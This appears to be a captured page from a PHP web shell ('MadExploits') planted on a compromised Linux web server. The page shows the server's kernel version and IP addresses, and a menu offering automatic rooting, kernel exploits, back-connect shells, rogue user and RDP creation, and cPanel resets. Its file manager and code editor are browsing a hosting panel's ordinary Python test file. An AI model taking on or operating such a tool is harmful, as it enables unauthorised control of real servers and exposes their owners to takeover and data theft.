Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.144.149.8
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
panel /
mod /
test /
java /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.py
0
B
-rw-r--r--
test_spring_config.py
1.49
KB
-rw-r--r--
test_sprintboot_mod.py
1.19
KB
-rw-r--r--
test_util.py
4.67
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test_sprintboot_mod.py
import time import unittest import sys if "/www/server/panel" not in sys.path: sys.path.insert(0, "/www/server/panel") from mod.project.java.projectMod import main as springboot_main from mod.base.web_conf.util import GET_CLASS from mod.project.java import utils class TestSpringBootConfig(unittest.TestCase): def setUp(self) -> None: self.springboot = springboot_main() # def test_process_for_create(self): # get = GET_CLASS() # get.is_java_process = '' # get.search = 'ja' # data = self.springboot.process_for_create(get) # print(data) # # def test_process_info_for_create(self): # get = GET_CLASS() # get.pid = "15701" # data = self.springboot.process_info_for_create(get) # print(data) # def test_create_port(self): # t = time.time() # print(t) # print(utils.create_a_not_used_port()) # print(time.time() - t) def test_get_jar_war_config(self): file = "/www/wwwroot/33_java/tduck-api.jar" data = utils.get_jar_war_config(file) if data: data = utils.to_utf8(data) print(data) if __name__ == '__main__': unittest.main()
Close